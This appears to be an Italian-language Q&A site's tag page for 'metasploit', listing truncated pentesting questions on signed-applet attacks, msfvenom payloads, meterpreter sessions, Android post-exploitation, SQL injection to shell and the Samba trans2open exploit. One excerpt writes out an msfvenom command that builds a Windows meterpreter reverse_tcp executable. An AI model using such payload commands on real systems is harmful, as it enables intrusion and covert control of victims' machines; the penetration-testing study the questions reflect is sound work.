Domande con tag 'metasploit'

1
risposta

Metasploit: l'attacco java_signed_applet si blocca dopo la risposta dell'utente

Sto tentando di eseguire un attacco lato client con Metasploit su una vittima di Windows 7 Professional N (SP1) a 32 bit. Ho Windows Defender e Firewall disabilitati e Java Control Panel Security impostato su Medium sulla vittima. Sulla macch...
posta 18.12.2018 - 23:03
1
risposta

Metasploit Handler non mostra le opzioni

Sto cercando di utilizzare il modulo exploit/multi/handler che ho usato in precedenza e non mi consente di impostare le opzioni. I comandi delle opzioni non mostrano nulla. Ho provato a reinstallare ( apt-get remove metasploit-framework &...
posta 15.12.2018 - 19:45
0
risposte

Msfvenom: crea il payload di Windows che richiede automaticamente i privilegi di amministratore

Quindi posso creare un payload di Windows con msfvenom con un semplice comando, ad esempio: msfvenom --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.58.109 LPORT=4485 EXITFUNC=thread -b '\x00' -f exe-only -o mypa...
posta 10.12.2018 - 06:25
1
risposta

Come impostare l'esecuzione automatica dei comandi di base?

Sto cercando di automatizzare gli script di un payload Metasploit Android. Posso automatizzare con successo qualsiasi script sul modulo /post , tuttavia, sto cercando di automatizzare geolocate , dump_calllog e altri che non si trov...
posta 25.09.2018 - 18:32
1
risposta

Passando al meterpreter nativo

Sono riuscito a ottenere una sessione meterpreter in esecuzione tra i miei server Kali Linux e Windows 2016 caricando un payload come servizio Web di Axis2 di Apache. Voglio passare a un meter meter di Windows (per utilizzare gli exploit di W...
posta 19.09.2018 - 14:45
1
risposta

percorso dell'eseguibile generato da msfconsole in Kali linux [chiuso]

Sono nuovo della sicurezza e dei test delle penne. Sto usando metasploit per generare il mio carico utile. Ho generato un payload usando generate -t exe -f shell.exe . Ma non riesco a trovare la posizione di shell.exe da nessuna parte in kali l...
posta 11.07.2018 - 19:33
0
risposte

Da SQL Injection in SQLite alla shell

Ho bisogno di ottenere una shell da un'iniezione SQL su un'applicazione con database SQLite. Attualmente il mio exploit ha il seguente aspetto: lucian@0x90:~/$ proxychains nc 10.185.10.55 1101 ProxyChains-3.1 (http://proxychains.sf.net) |S-...
posta 07.08.2018 - 16:18
0
risposte

Metasploit INFILENAME: opzione non valida

Sto utilizzando MSF su Kali ma ho riscontrato un problema. Sto provando adobe_pdf_embedded_exe e ho impostato INFILENAME su readme.pdf. Tutto il resto funziona bene, ma quando provo a eseguirlo usando il comando exploit , mi dà...
posta 28.06.2018 - 09:13
1
risposta

Disabilita i moduli in Metasploit Pro

Utilizzo Metasploit Pro da alcuni giorni. Capisco che lo sfruttamento nella versione Pro sia automatico usando exploit rank (GUI). Ma se voglio disabilitare determinati moduli durante lo sfruttamento, è possibile disabilitare? È necessario qu...
posta 29.08.2018 - 04:11
1
risposta

trans2open non funziona su metasploit

Sto usando metasploit per sfruttare una versione vulnerabile di Samba su un host remoto. Samba versione 2.2.8, scaricato direttamente dal sito cve. Ma quando uso exploit trans2open con payload (generic / shell_reverse_tcp) ottengo il seguente...
posta 22.08.2018 - 17:11